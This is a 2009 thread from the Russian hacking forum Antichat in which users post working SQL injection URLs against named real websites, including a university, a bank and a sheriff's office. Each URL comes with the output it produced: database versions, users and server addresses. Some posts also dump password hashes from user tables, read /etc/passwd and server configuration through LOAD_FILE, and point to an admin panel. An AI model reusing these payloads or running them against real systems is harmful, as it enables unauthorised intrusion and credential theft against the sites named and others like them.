ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8531  
Старый 24.03.2009, 00:23
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
https://archserv.arch.vt.edu/equipment/type.php?id=798796959872+union+select+1,2,concat_w s(0x3a,version(),user(),database()),4,5--
Version: 5.0.37
User:search@localhost
Database: archweb




PageRank = 5


Цитата:
http://www.oncars.com/news-blogs/viewStory.php?id=9687687609872+union+select+1,2,3, 4,5,6,7,concat_ws(0x3a,version(),user(),database() ),9,10,11,12,13,14,15--

Database Version: 5.0.51a-18-log
Database name: oncarsdata
User name: oncars_admin@64.22.128.61

Последний раз редактировалось spherics; 24.03.2009 в 00:39..
 
Ответить с цитированием

  #8532  
Старый 24.03.2009, 00:47
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.sozialnetz-mil.de/details2.php?id=77%27+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():db1032133-test
user():dbu1032133@localhost
 
Ответить с цитированием

  #8533  
Старый 24.03.2009, 00:58
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

http://www.sushi-market.ru/catalog.php?view=product&id_kuhnya=1&id_cat=4&id=-1+UNION+SELECT+concat(login,0x3a,pass),2,3+FROM+us ers+LIMIT+0,1/*

4 версия, вывод в тайтле
Админка тут http://www.sushi-market.ru/admin
Где лежат админы - хз
 
Ответить с цитированием

  #8534  
Старый 24.03.2009, 01:03
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank = 6

Цитата:
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+union+select+1,2,3,4,5,conca t_ws(0x3a,version(),user(),database()),7,8,9,10,11 ,12,13--


Database Version: 5.0.45
Database name: FAD
User name: admin@localhost


Цитата:
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+union+select+1,2,3,4,5,conca t_ws(0x3a,user,password),7,8,9,10,11,12,13+from+my sql.user--

pma_0QzUtRnrJLEV : 17262bd87c9d234c
admin : 63da210b5b938bd4
test : 22adbe442782abc1



Читаем: etc/passwd


http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+UNION+SELECT+1,2,3,4,5,CONCA T(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),7 ,8,9,10,11,12,13--




Читаем: /etc/httpd/conf/httpd.conf

Цитата:
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+UNION+SELECT+1,2,3,4,5,CONCA T(0x3a,LOAD_FILE(0x2F6574632F68747470642F636F6E662 F68747470642E636F6E66),0x3a),7,8,9,10,11,12,13--
 
Ответить с цитированием

  #8535  
Старый 24.03.2009, 02:32
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://pascn.pids.gov.ph/resprojects.phtml?stid=4+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4/*
version():4.0.23-standard
database():APEC
user():pascn@203.167.111.188

Код:
http://www.chambers-bank.com/location_details.php?id=1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12+limit+1,1/*
version():4.1.22
database():CHECKIN_DB
user():CHECKIN_ADMIN@216.81.70.64
 
Ответить с цитированием

  #8536  
Старый 24.03.2009, 03:13
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://www.astrofest.ru/page.php?id=-1303+union+select+1,2,concat_ws(0x3a,user(),versio n(),database())--
ostapenko_afest@localhost:4.1.22stapenko_afest

http://www.beermachine.ru/katalog.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4--
u28651@10.10.153.174:5.0.67-log:u28651
 
Ответить с цитированием

  #8537  
Старый 24.03.2009, 04:15
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.divoclub.ru/katalog.php?id=-20+union+select+1+from+mysql.user--
Database Version: 4.1.16
Database name: DIP
User name: root@localhost

Есть достyп к mysql.user
 
Ответить с цитированием

  #8538  
Старый 24.03.2009, 11:31
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
user() : database() : version()
karabas_svalka2@localhost : karabas_svalka2 : 5.0.67-community


http://forum.antichat.ru/showthread.php?p=1187222#post1187222
 
Ответить с цитированием

  #8539  
Старый 24.03.2009, 17:40
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.dosgraveyard.com/game.php?id=7987986446+union+select+concat_ws(0x3a ,version(),user(),database()),2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--

Database Version: 5.0.51a
Database name: dosgraveyard
User name: dosgraveyard@77.232.68.30


Цитата:
http://www.dosgraveyard.com/game.php?id=7987986446+UNION+SELECT+CONCAT(0x3a,(S ELECT+CONCAT(username,0x3a,password)+FROM+dosgrave yard.members+LIMIT+0,1),0x3a),2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--

: abdalis : 06c219e5bc8378f3a8a3f83b4b7e4649
: diggyboy : 06c219e5bc8378f3a8a3f83b4b7e4649



Цитата:
http://stardustobservatory.org/image.php?id=798798654479+union+select+1,2,3,conca t_ws(0x3a,version(),user(),database()),5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20--
Database Version: 5.0.67.d7-ourdelta-log
Database name: stardust
User name: stardust@208.109.181.232



Цитата:
http://www.crawfordhanus.com/single.php?id=80980975644+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7,8,9,1 0,11,12,13,14--

Version: 4.0.27-standard
User: crawford_gallery@localhost
Database: crawford_chphoto
 
Ответить с цитированием

  #8540  
Старый 24.03.2009, 19:22
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Код:
http://www.realtyplanex.com/estate.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.1.10-standard
Database name: planexestates
User name: planexestates@localhost

Таблица users


Код:
http://www.pickereurope.org/page.php?id=-20+union+select+1,2,3,4--
Database Version: 5.0.68
Database name: picker
User name: pickeruser@localhos


Код:
http://www.baxtercountysheriff.com/page_view.php?id=-20+union+select+1,2,3,4,5,6--
Database Version: 5.0.45
Database name: bcsd_dymin
User name: bcsd@localhost

Последний раз редактировалось .:[melkiy]:.; 24.03.2009 в 19:54..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
 


Быстрый переход




ANTICHAT.XYZ